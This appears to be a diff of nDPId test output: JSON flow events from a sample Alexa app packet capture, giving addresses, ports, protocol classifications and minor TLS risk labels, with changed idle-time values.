+00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976196016,"flow_last_seen":1490976196282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":58048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1490976067968,"flow_last_seen":1490976168824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":26805,"flow_avg_l4_payload_len":478,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.146","src_port":41691,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976195633,"flow_last_seen":1490976195989,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6582,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976090991,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5257,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976100859,"flow_last_seen":1490976107676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5318,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1490976195633,"flow_last_seen":1490976195989,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6582,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976090991,"flow_last_seen":1490976094931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5257,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41820,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976091048,"flow_last_seen":1490976094931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":7,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41821,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976100859,"flow_last_seen":1490976107676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":5318,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976090796,"flow_last_seen":1490976090982,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":35726,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976027733,"flow_last_seen":1490976027826,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976027733,"flow_last_seen":1490976027826,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00948{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1490976196223,"flow_last_seen":1490976196880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24810,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976024857,"flow_last_seen":1490976024994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00948{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1490976196223,"flow_last_seen":1490976196880,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24810,"flow_avg_l4_payload_len":400,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":38483,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1490976024857,"flow_last_seen":1490976024994,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":60246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"}} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041428,"flow_last_seen":1490976168813,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976082723,"flow_last_seen":1490976084872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5020,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1490976090572,"flow_last_seen":1490976094931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12466,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 